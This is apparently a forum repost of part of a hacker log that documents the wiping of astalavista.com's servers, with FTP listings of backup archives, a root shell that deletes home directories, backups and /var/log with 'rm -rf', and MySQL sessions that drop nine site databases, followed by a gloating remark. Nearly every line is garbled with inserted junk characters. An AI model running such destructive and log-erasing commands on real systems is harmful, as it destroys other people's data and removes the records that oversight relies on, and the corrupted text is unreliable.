-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar/ Y7 h& w( a( u! P F7 ~- p
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar1 o" q9 u0 b; A& K4 C7 L4 P
[snip]3 g, i y9 x$ H6 o
226 Transfer complete.
! r1 q4 `/ U8 |! [$ o8 Fftp> mdelete *; r8 }) G% l. z7 f2 [: M
ftp> ls -la4 t: B- [8 S) }4 v4 Y9 F
227 Entering Passive Mode (212,254,194,163,2,193)
. M6 B5 Z! J- ]( ?1 P150 Opening BINARY mode data connection for ‘file list’.3 L+ {7 d- `0 c/ N( ^' t+ t
226 Transfer complete.
; J# V, E F* {, ~9 W9 \0 y* Z/ Sftp>6 Y9 z1 E" b- E# S
! j0 k% W5 ^6 M% U$ z8 M
sh-3.2# cd /home3 W% g+ U- F/ u" w
sh-3.2# ls -la
# a c* h: z) t1 w- ptotal 120
% ?; s2 c: q# `3 ^( B" zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
* c% j% R* D: U. Hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, B, j9 v f' Y; m udrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
% J% y' k ]) y# x-rw——- 1 root root 8192 Jun 4 03:03 aquota.group+ C: U, b% Z/ m7 L
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user* W9 u& A% v. W w$ Z
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
3 h1 H6 z7 d# hdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
* I9 K, _4 ~- i! ddrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
2 j" [' F! }1 ]6 U6 idrwx–x–x 10 com com 4096 Apr 28 12:40 com4 O5 o h: b- C( t
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
& C! J: I7 I4 ]' qdrwx—— 3 jon jon 4096 Sep 21 2007 jon
) [ ]) E0 [6 T- Q; V9 zdrwx—— 2 root root 16384 Sep 11 2007 lost+found
! Y' S- ~ x/ w7 P* M& N' @# T2 ldrwxr-xr-x 2 root root 4096 Sep 14 2007 my
$ H( s# D' y, Vdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
+ @: \9 F* g' `% b- r6 ndrwx—— 2 jon jon 4096 Sep 15 2007 test
) i! K# N% I$ L4 D2 o' ]drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp6 `# O+ b! x# [5 c9 K
8 r, A8 R/ D( U8 h$ b2 c# |
sh-3.2# rm -rf backup/
8 L4 k# k1 y5 Y$ @8 l9 ksh-3.2# rm -rf backup.14161/
, f4 i8 ^8 O5 w4 T6 {sh-3.2# rm -rf ftp/
* t% N. j/ ~ ~2 @. U3 J1 [4 Vsh-3.2# rm -rf jon/7 m0 ]* _* A. ^/ P* w
sh-3.2# rm -rf my/% J% c. I; I3 A" v8 G
sh-3.2# rm -rf mysqldata/
4 l; q. _, n1 P5 x: e7 V5 O4 Ush-3.2# rm -rf test/( j/ g1 o! U! x# x
sh-3.2# rm -rf tmp/
5 E! A4 j# u7 Qsh-3.2# cd ~ {; h# z" I& J# F8 }; Q
sh-3.2# rm -rf *. O, w$ D6 Y( ?/ m
sh-3.2# rm -rf /var/log// C/ D: {8 E1 ~5 l9 L. Z
rm: cannot remove directory `/var/log//proftpd’: Directory not empty, e. v' q# e# v. M9 ~2 G
sh-3.2# rm -rf /home/*
3 j. y$ D5 |; t2 E8 D# x7 R1 Z( Tsh-3.2# mysql0 Z: i" R, @2 s
Welcome to the MySQL monitor. Commands end with ; or \g.- j/ a' q4 S: y# @
Your MySQL connection id is 407156
3 u0 w! R; s: J3 ?7 o7 n- }Server version: 5.0.45-community-log MySQL Community Edition (GPL)
8 E% z- f7 Q& ? `' Y& q# o! i. c5 L2 z4 C& f1 @: K
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.$ r8 o& x# [* e8 @3 }/ m
- }& u# e/ ~# |* Z$ b \
mysql> show databases;; D6 S$ M( f3 m( x2 G8 U/ f1 z
+———————–+! S# U/ z5 e5 q8 _
| Database |
1 Q& `& B$ w: G/ L+———————–+
7 c" A7 }7 v' u| information_schema |) N4 V6 ?9 w5 P
| astanet_ads |) L {# L5 e% s' S9 {
| astanet_mailing_lists |
$ S8 G s2 Q) ]& P| astanet_mediawiki | Z) }0 |, L- p& a8 g
| astanet_membersystem |9 Z( W6 u# u! |6 b& @
| com_contrexx |
) }3 z b: z- j& Z| com_contrexx2 |
. N: Z7 a! z! H8 `( D) l0 A) P+ B| com_contrexx2_live |- H2 I X6 q- K* c" K
| da_roundcube |
; v, `2 P# H6 Q4 g* A# b- R| dolphin |1 ^! i) G* r! a3 m( W5 \& [
| ideapool |
" H) z1 n7 S2 l6 r' Z8 I6 L% K| mysql |
( o. P2 n" P, W9 M- ?& `| test |
' z# C( e, V8 `* M| yourmaster |
+ l5 q8 ]5 n* _: j4 Y; n+———————–+
7 c' |7 k: L) `. T14 rows in set (0.03 sec)9 ?6 h/ ?3 k3 I2 M) D& @
3 h# n: Z1 O3 d; {+ [% g+ c* M
mysql> drop database astanet_membersystem; J7 M" b v- }% x) r& ]! B2 c* ~& u
droQuery OK, 46 rows affected (0.81 sec)
0 o8 I) Z8 c, ?; s1 q
) W! p" ~+ } n- f1 k' @mysql> drop database com_contrexx;
# X" v' \+ q4 v1 H+ n) H& iQuery OK, 211 rows affected (2.72 sec)
8 _" W; q* r+ d p2 B. e2 @! F) K$ v k& u4 ]
mysql> drop database com_contrexx2;
% e7 T" ?4 @- N6 z2 @+ XQuery OK, 237 rows affected (2.23 sec)9 u. [+ c3 Z; h: L
6 o. e- R3 v* H# ^0 @0 C
mysql> drop database com_contrexx2_live;
( C# s4 K$ a; d# z& @( W7 @Query OK, 227 rows affected (7.63 sec)7 a- w6 I! X$ m! ]% I7 @8 O
, l4 J% E B2 b+ s: ?- S) emysql> drop database ideapool;1 R0 z# R7 ^( v8 [0 Z' x
Query OK, 69 rows affected (0.19 sec)
% B! t2 C* W( u/ b) A8 o1 ? ]( ?+ a! W6 ]: D: k/ M
mysql> drop database yourmaster;# e% X+ i+ t. ?$ P1 T( s# C3 U" Y
Query OK, 158 rows affected (0.55 sec)0 \, M. \, y! C; ?: ^
. N2 ~8 B' U5 b% H# T( G* j2 C9 K
mysql> drop database astanet_ads;& ]) D! B# O7 J/ m) c4 N- J
Query OK, 9 rows affected (0.11 sec)
/ I+ A! i1 E4 L/ Q% N! F" G
% L: w; P$ { q2 a) q2 A8 `mysql> drop database astanet_mailing_lists;6 ?1 L! H' Y4 p) ]! |4 [( Q! p
Query OK, 24 rows affected (1.47 sec)
5 R% Q- Q0 A) w. u" J5 M0 \& e1 c( o2 z0 W! S) \
mysql> drop database astanet_mediawiki;3 {! t+ J" l+ e+ {) R+ }" ]
Query OK, 31 rows affected (0.51 sec)
; w) s$ E5 Q, t7 Y
' p. ]/ L4 v2 ?3 M- Dmysql> show databases;
2 ~# h; O- q! U3 n0 k+——————–+
2 _! Z/ K4 B6 {| Database |7 i* v( [# t4 t! O
+——————–+6 k u+ G$ Q' P, e# t$ [# e
| information_schema |4 b. B$ `. X- r) ^8 o- ?& ~
| da_roundcube |+ v# j! ~, }" D9 a, n0 r6 a
| dolphin |
4 L! _/ b0 B4 u2 e `' Z| mysql |
, H; z$ ^* F U0 ~+ @- o| test |
& O1 {% Y3 l9 d) k8 I+——————–+* x; c O. d9 S9 `- d v
5 rows in set (0.00 sec)
- p7 [; a' i0 W( G) P1 \( }& k. ^( ^1 L1 n+ \* }( j
What a journey! We’re not sure exactly why the “Terminator” had any influence on
3 F! p0 a" ]( J/ K0 |. rtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
8 [$ _- Z2 @# e, ]' N& Dwrong to say this pack of morons *wont be back*.6 K' S) Q: X8 o" X+ s6 G3 R
|
发表于 2012-11-6 21:07:34
收藏
分享
支持
反对